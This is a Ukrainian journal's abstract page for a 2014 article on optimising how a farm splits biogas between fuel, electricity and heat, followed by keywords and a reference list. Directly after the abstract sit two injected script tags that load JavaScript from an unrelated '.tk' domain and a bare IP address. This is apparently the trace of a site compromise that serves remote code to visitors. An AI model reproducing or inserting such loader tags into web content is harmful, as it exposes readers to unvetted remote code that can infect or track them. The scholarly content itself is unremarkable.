ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43:62.61
Економіка агропромислового виробництва

Визначення економічно доцільного напряму використання біогазу / Гавриш В. І. // Економіка АПК. - 2014. - № 3 - С. 24

Розглянуто напрями використання біогазу, показано проблеми, які виникають при експлуатації біогазових установок. Розроблено економіко-математичну модель визначення оптимального розподілу біогазу для виробництва різних видів енергії з метою одержання максимального валового доходу. Вона враховує витрати енергетичних ресурсів для забезпечення роботи біогазової установки, потреби самого сільськогосподарського формування у моторному паливі, електричній та тепловій енергії. Також враховується одночасність роботи енергетичного обладнання, яке використовує біогаз. Наведено приклад використання запропонованої моделі й порівняння одержаних результатів із стандартним варіантом (використання біогазу в когенераційній установці). Розрахунки показують, що оптимальний розподіл біогазу для задоволення енергетичних потреб забезпечує суттєво більший валовий дохід. Табл.: 1. Рис.: 3. Бібліогр.: 19.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: біогаз, біогазова установка, ефективність, використання, економіко-математична модель, методика

Список використаних джерел

 1. Агроекологія / [ М.М. Городній, М.К. Шикула, І.М. Гудков та ін.]. – К.: Вища шк., 1993. – 416 с.
 2. Біопалива (технологія, машини та обладнання) [В.О. Дубровін, М.О. Корчемний, І.П. Масло та ін.]. – К.: ЦТІ «Енергетика і електрифікація», 2004. – 256 с.
 3. Варпіховський Р.Л. Самозабезпеченість ферми енергоносіями при використанні новітніх технологій переробки гною / Р.Л. Варпіховський, А.В. Смірнова, Т.В. Варпіховська // Зб. наук. праць Вінницького нац. агр. ун-ту. – 2010. – Вип. 42, т. 2. – С.117–120.
 4. Виробництво і використання біогазу в Україні / [ Р.Шульц, Ю.Кооп, Ж.Хоххі та ін.]. – К.: Бізнесцентр «Євразія», 2012. – 74 с.
 5. Гавриш В.И. Экономическая эффективность использования биогаза / В.И.Гавриш // Зб. наук. праць Вінницького нац. аграр. ун-ту. – 2010. – Вип. 42, т. 4. – С.82–87.
 6. Друкований М.Ф. Сучасні технології переробки біомаси в біогаз та органічні добрива / М.Ф. Друкований, О.С. Яремчук, О.В. Герега, В.Г. Літинський // Зб. наук. праць Вінницького нац. аграр. ун-ту. – 2010. – Вип. 42, т. 2. – С. 125–140.
 7. Економічне використання енергоресурсів у сільськогосподарському виробництві / В.Г. Бебко, С.Я. Межений, В.Г. Стафійчук, В.Ф. Юрчук. – К.: Урожай, 1991. – 144 с.
 8. Корчемний М.Ф. Енергозабезпечення в агропромисловому комплексі / М.Ф. Корчемний, В.С. Федорейко, В.В. Щербань. – Тернопіль: Підручники та посібники, 2001. – 984 с.
 9. Куценко О.М. Агроекологія / О.М. Куценко, В.М. Писаренко. – К.: Урожай, 1995. – 256 с.
 10. Новітні технології біоконверсії : моногр. / [Я.Б. Блюм, Г.Г. Гелетуха, І.П. Григорук та ін.]. – К. : Аграр Медія Груп, 2010. – 326 с.
 11. Поляки купуватимуть український біогаз // Farmer. – 2012. – Жовтень. – С.10.
 12. Юдин Д.Б. Линейное программирование (теория, методы и приложения) / Д.Б. Юдин, Е.Г. Гольштейн. – М. : Наука, 1969. – 520 с.
 13. Яремчук О.С. Ефективність використання інноваційних напрямків при переробці на біогаз відходів годівлі та утримання великої рогатої худоби / О.С. Яремчук, О.Л. Польова // Зб. наук. праць Вінницького нац. аграр. ун-ту. – 2010. – Вип. 42, т. 2. – С. 107–112.
 14. Abbasi S.A. Modelling and simulation of biogas system economics. – Ashish, India, 2005. – 380 p.
 15. Biomethane from Dairy Waste. A Sourcebook for the Production and Use of Renewable Natural Gas in California / Ken Krich, Don Augenstein, JP Batmale, John Benemann, Brad Rutledge, Dara Salour. – USDA Rural Development, July 2005. – 282 p.
 16. Borjesson, Р. Biogas as a resource of efficient vehicle fuel / P.Borjesson, B.Mattiasson // Trends in Biotechnology. – 2007. – Vol . 26, #1. – P.7-13.
 17. Enter the tractor with a bottle on top. – Farmer Weekly, 1982. – #1. – P.69.
 18. Gora B. Produkcja biogazu z gnojowicy i obornika w gospodarstwach rolnych. – Warszawa: Wyd. CBR, 1985.
 19. Riipinen, T. Valtra Dual Fuel Biogas Tractor / T.Riipinen, A.Chantrelle // Biogaz Europe. Nantes, France. – 25-26 October 2011.
Читати статтю: 14_03_24-29.pdf